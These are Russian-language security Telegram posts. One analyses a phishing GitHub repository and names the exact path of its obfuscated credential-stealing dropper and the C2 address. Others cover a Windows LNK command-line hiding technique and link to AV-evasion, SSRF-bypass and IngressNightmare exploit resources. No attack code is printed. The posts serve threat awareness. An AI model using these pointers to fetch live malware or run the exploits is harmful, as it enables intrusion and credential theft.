При запуске вредоносного кода происходит утечка данных криптокошельков, паролей и доступов к различным аккаунтам. Также скачиваются разного рода нагрузки (на Python, злоумышленники его очень любят, потому что антивирусы с ним плохо умеют работать, как и со всеми скриптовыми языками), позволяющие надёжнее закрепиться в системе жертвы и, в идеале, получить полный контроль над ней.
Из относительно интересного: вредонос старается определить, что работает в виртуальной машине (например, в песочнице) или под отладчиком. В этом случае он просто завершается и дальнейшее развитие атаки не производится.
Мошенники не обращают внимание на юрисдикции и гражданства, работая "широким гребнем". По гражданам России тоже работают. Скам - интенсивно развивающаяся международная угроза с постоянно растущим оборотом и относительно невысокими рисками для злоумышленников. Обложка журнала The Economist к этому посту от 8 февраля 2025 года об этом говорит.
Фишинговый аккаунт на github: https://github.com/wenode1002
Репозиторий с вредоносным кодом называется chess. Вредоносный имплант находится в единственном файле HEAD по этому пути: https://github.com/wenode1002/chess/tree/main/.github/logs/refs/heads/.DS_Store/
Имплант - это заобфусцированный дроппер, который обращается по адресу 94.131.107.227:1224
Следует отметить, что этот репозиторий эпизодически пропадает, а потом появляется вновь. Злодеи стараются максимально долго не спалить инструментарий, аккаунт, IP-адреса. Логично.
Наши выводы совпадают с теми, что мы делали ранее. Инструменты мошенников, следует отметить, становятся технологичнее. Сами мошенники работают изощреннее, профессиональнее и осторожнее. Забавно, что при лёгкой модификации (добавление пробела в ничего не значащее место) вредоносный имплант перестаёт обнаруживаться некоторыми чрезвычайно популярными антивирусами (на момент анализа нами так было). Не просто сигнатурным поиском, что было бы логично, но эвристическими движками
#фишинг #offensive #malware
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤🔥2
Давно ничего не писал. Исправляюсь и больше постараюсь так не делать :)
Интересная особенность обнаружена в механизмах отображения командной строки ярлыков Windows (lnk-файлов): если грамотно её сформировать, используя символы пробелов (их несколько: обычный пробел, горизонтальная и вертикальная табуляции, символы подачи строки и формы, возврат каретки), то строка не будет видна пользователю в свойствах ярлыка. Это позволяет обходить визуальный контроль. Отличие от подобных методов сокрытия вредоносных строк, команд и имплантов, которые применяются, например, в фишинговых атаках на разработчиков, которые мы подробно разбирали ранее, в том, что эту командную строку штатными средствами не увидишь.
Подробное описание: https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html
#offensive #windows
Интересная особенность обнаружена в механизмах отображения командной строки ярлыков Windows (lnk-файлов): если грамотно её сформировать, используя символы пробелов (их несколько: обычный пробел, горизонтальная и вертикальная табуляции, символы подачи строки и формы, возврат каретки), то строка не будет видна пользователю в свойствах ярлыка. Это позволяет обходить визуальный контроль. Отличие от подобных методов сокрытия вредоносных строк, команд и имплантов, которые применяются, например, в фишинговых атаках на разработчиков, которые мы подробно разбирали ранее, в том, что эту командную строку штатными средствами не увидишь.
Подробное описание: https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html
#offensive #windows
TrendAI
ZDI-CAN-25373 Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns | TrendAI (US)
Trend Zero Day Initiative™ (ZDI) uncovered both state-sponsored and cybercriminal groups extensively exploiting ZDI-CAN-25373 (aka ZDI-25-148), a Windows .lnk file vulnerability that enables hidden command execution.
👍2
Про то, как на самом деле создаются нагрузки, запускаемые на машинах жертв, хорошо рассказывается здесь: https://practicalsecurityanalytics.com/building-a-runtimeinstaller-payload-pipeline-to-evade-av-detection/
Статья описывает конкретный инструментарий и является в некотором роде рекламной, но сам процесс и лежащая в основе идея показаны очень хорошо. У этого процесса есть название: Payload Pipeline. Если совсем кратко, то для каждого случая уникальная нагрузка генерируется автоматически с встроенным механизмами обхода антивирусов и прочих защитных механизмов (типа AMSI), оригинальными методами запуска, обфускацией и т.д.
Выявить сигнатуры, за которые можно зацепиться, чтобы потянуть всё семейство сгенерированных подобным инструментом вредоносов, довольно сложно. Зачастую невозможно. Широкое использование ИИ атакующими усугубляет проблему. Но как-то обнаруживать такие вещи нужно. Очевидно, что здесь всё большую роль будет играть эвристика, включая ту, что использует ИИ и ML. ИИ и ML в защите - это прежде всего выявление аномалий и подозрительных признаков. Мы об этом писали 3 года назад в контексте NGAV. Сейчас это безусловный мейнстрим и единственный вариант. Для тех, кто балуется обфускацией и прочими hack tricks в своих легальных программных продуктах, сюрпризов будет ещё больше, чем сейчас. В целом, подозреваю, будет больше false positives, пока не установится новая нормальность: что-то типа best practice для разработчиков, как лучше писать и оформлять код и чем его компилировать
#ии #offensive
Статья описывает конкретный инструментарий и является в некотором роде рекламной, но сам процесс и лежащая в основе идея показаны очень хорошо. У этого процесса есть название: Payload Pipeline. Если совсем кратко, то для каждого случая уникальная нагрузка генерируется автоматически с встроенным механизмами обхода антивирусов и прочих защитных механизмов (типа AMSI), оригинальными методами запуска, обфускацией и т.д.
Выявить сигнатуры, за которые можно зацепиться, чтобы потянуть всё семейство сгенерированных подобным инструментом вредоносов, довольно сложно. Зачастую невозможно. Широкое использование ИИ атакующими усугубляет проблему. Но как-то обнаруживать такие вещи нужно. Очевидно, что здесь всё большую роль будет играть эвристика, включая ту, что использует ИИ и ML. ИИ и ML в защите - это прежде всего выявление аномалий и подозрительных признаков. Мы об этом писали 3 года назад в контексте NGAV. Сейчас это безусловный мейнстрим и единственный вариант. Для тех, кто балуется обфускацией и прочими hack tricks в своих легальных программных продуктах, сюрпризов будет ещё больше, чем сейчас. В целом, подозреваю, будет больше false positives, пока не установится новая нормальность: что-то типа best practice для разработчиков, как лучше писать и оформлять код и чем его компилировать
#ии #offensive
Practical Security Analytics LLC
Building a RuntimeInstaller Payload Pipeline to Evade AV Detection
Overview In this post, we will build an automated pipeline for generating a .NET loader payload that can evade both AV detection and application controls. The tools used in this post are: SpecterIn…
👍4
Знаем, что среди подписчиков есть.люди, имеющие отношение к робототехнике и мехатронике. В том числе и к преподаванию этих дисциплин. Возможно вам, уважаемые коллеги, этот открытый набор лекций будет интересен: https://github.com/madibabaiasl/modern-robotics-course/wiki
#робототехника
#робототехника
GitHub
Home
This repository is all the lessons for Modern Robotics Course. - madibabaiasl/modern-robotics-course
👍5
Рекриптор
Давно ничего не писал. Исправляюсь и больше постараюсь так не делать :) Интересная особенность обнаружена в механизмах отображения командной строки ярлыков Windows (lnk-файлов): если грамотно её сформировать, используя символы пробелов (их несколько: обычный…
А вот и детальное описание PoC подоспело: https://zeifan.my/Windows-LNK/
Можно, как в ранее известных техниках с ярлыками, прицепить нагрузку в конец LNK-файла и выполнить её с помощью PowerShell, например
#offensive #windows
Можно, как в ранее известных техниках с ярлыками, прицепить нагрузку в конец LNK-файла и выполнить её с помощью PowerShell, например
#offensive #windows
Security Research
Windows LNK - Analysis & Proof-of-Concept
OverviewI came across the writeup from Trend Micro on the article ZDI-CAN-25373: Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns. TL;DR here is the summary from them:- Trend Zero Day Initiative™ (ZDI) identified nearly 1,000 malicious…
👍4
Шпаргалка по обходу механизмов проверки URL: https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet
#offensive
#offensive
👍2
Вышел PoC для IngressNightmare: https://github.com/hakaioffsec/IngressNightmare-PoC
Кто не обновил Ingress-NGINX, надо обновить. Подробное описание угрозы здесь: https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
#offensive
Кто не обновил Ingress-NGINX, надо обновить. Подробное описание угрозы здесь: https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
#offensive
GitHub
GitHub - hakaioffsec/IngressNightmare-PoC: This is a PoC code to exploit the IngressNightmare vulnerabilities (CVE-2025-1097, CVE…
This is a PoC code to exploit the IngressNightmare vulnerabilities (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, and CVE-2025-1974). - hakaioffsec/IngressNightmare-PoC
👍3